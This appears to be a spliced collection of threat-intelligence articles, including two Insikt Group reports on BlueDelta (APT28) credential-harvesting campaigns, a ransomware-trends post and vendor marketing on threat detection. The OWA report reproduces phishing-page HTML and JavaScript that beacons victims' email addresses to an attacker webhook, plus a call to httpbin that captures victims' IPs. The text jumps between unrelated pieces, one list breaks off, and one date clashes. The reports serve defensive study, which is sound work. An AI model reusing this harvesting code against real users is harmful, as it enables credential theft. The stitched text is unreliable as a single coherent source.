Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”

Pathways to advancing maturity

Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”

Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”

Top challenges for CTI teams

The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”

Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.

Looking to the future of threat intelligence

When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.

Watch the recordings of the North America and EMEA webinar sessions to learn more, and download the 2025 State of Threat Intelligence Report to see how your peers are evaluating, investing in, and operationalizing threat intelligence.

The analysis cut-off date for this report was September 11, 2025

Executive Summary

Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.

Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.

BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.

BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.

Key Findings

• BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
• The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
• Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
• BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
• Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.

Microsoft OWA Credential Harvesting

On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.

Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)

BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.

The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.

<html>
  <head>
    <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width">
        <meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4">
  </head>
  <body>
    <object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"></object>
  </body>
</html>

Figure 2: HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)

The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”

Figure 3: Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)

After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.

As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.

Figure 4: Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)

<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>

Figure 5: JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)

The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.

When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.

Key Takeaways

• Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
• Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
• Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.

The ransomware paradox: More attacks, less money

By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.

For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.

This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.

Trend 1: DDoS services return to the RaaS model

With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.

The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.

• What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.

Trend 2: Insider recruitment attempts are accelerating

Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.

The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.

• What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.

Trend 3: Gig workers as unwitting attack vectors

According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.

The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.

• What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.

Looking ahead: One big prediction for 2026

The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.

Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.

The bottom line: Strengthen your ransomware defenses

Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:

• Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
• Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
• Download the Proactive Ransomware Mitigation eBook for actionable strategies to identify, investigate, and prioritize cyber threats.

Key Takeaways

• Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
• Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
• Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
• Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
• Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.

Why Digital Threat Detection Requires a New Approach

Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:

• High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
• Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
• Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
• Alert fatigue from manually sifting through noise to find high-risk signals.

As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.

Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.

The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.

Understanding the Modern Digital Threat Landscape

To build an effective digital threat detection program, security teams must understand where modern threats originate and how attackers operate.

Key Threat Vectors Beyond the Perimeter

Leaked credentials and account takeover attempts (stolen identities)

Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.

Brand impersonation, domain spoofing, and phishing campaigns

Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.

Vulnerability exploitation and zero-day threats in the external attack surface

Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.

Dark web chatter and early warning signs of planned ransomware or DDoS attacks

Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.

Why an Intelligence-Driven Approach is Better

For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.

Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.

The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.

Essential Digital Threat Detection Tools and Technologies

Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.

Threat Intelligence Platforms: The Engines of Context

No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.

Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:

• Open web reporting
• Underground forums
• Dark web marketplaces
• Malware sandboxes
• Threat feeds
• Researcher data

Once the data is normalized, the platform enriches it with context, such as:

• Relationships between indicators
• Associations with known threat actors
• Infrastructure reuse
• Activity targeting specific industries or regions

This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.

Security Orchestration, Automation, and Response (SOAR)

While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.

Key SOAR capabilities include:

• Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
• Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
• Initiating takedown workflows for harmful domains or impersonation infrastructure
• Coordinating actions across multiple security tools to ensure a unified response
• Documenting each step of the investigation for reporting and compliance

By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.

Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration

EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.

EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.

Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.

Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.

Overcoming the Analyst’s Biggest Pain Points

Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.

The Drain of Alert Fatigue and False Positives

High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.

The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.

The Blind Spots of External Risk

Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.

These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.

Recorded Future: Operationalizing Digital Threat Intelligence at Scale

Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.

Real-Time Context from the Intelligence GraphⓇ

The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:

• Open web
• Dark web marketplaces
• Malware repositories
• Technical feeds
• Network telemetry
• Closed underground forums

No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.

Comprehensive Digital Risk Protection for External Threats

Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.

Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.

Accelerating Time-to-Action through Integrated Intelligence

Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.

An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.

Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.

This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.

Smarter, Faster Security Decisions

Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.

By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.

These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.

Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.

The analysis cut-off date for this report was July 30, 2025

Executive Summary

Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.

Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.

BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.

Key Findings

• BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
• The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
• BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
• Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
• The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.

Figure 1: The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)

The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as per Figure 2.

Figure 2: UKR.NET credential capture page JavaScript (Source: Recorded Future)

The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.

At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.

The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.

BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.

var respIP=$.getJSON('hxxps://httpbin[.]org/ip');

Figure 3: Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)

Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.

On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.

The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.

In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.

Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.

On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.

Figure 4: JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)

Figure 5: JavaScript code used to capture credentials (Source: Recorded Future)

During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.

Figure 6: PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages

(Source: Recorded Future)

Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:

• doads[.]org
• in[.]run
• t[.]ly
• tiny[.]cc
• tinyurl[.]com
• linkcuts[.]com

In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:

Introduction

The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.

The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.

This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.

Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.

Key Trends Driving Threat Intelligence Evolution

There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.

• Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
• Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
• Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
• Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).

Challenges Holding Team Backs Today

Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.

• Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
• Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
• Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
• Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.

These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.

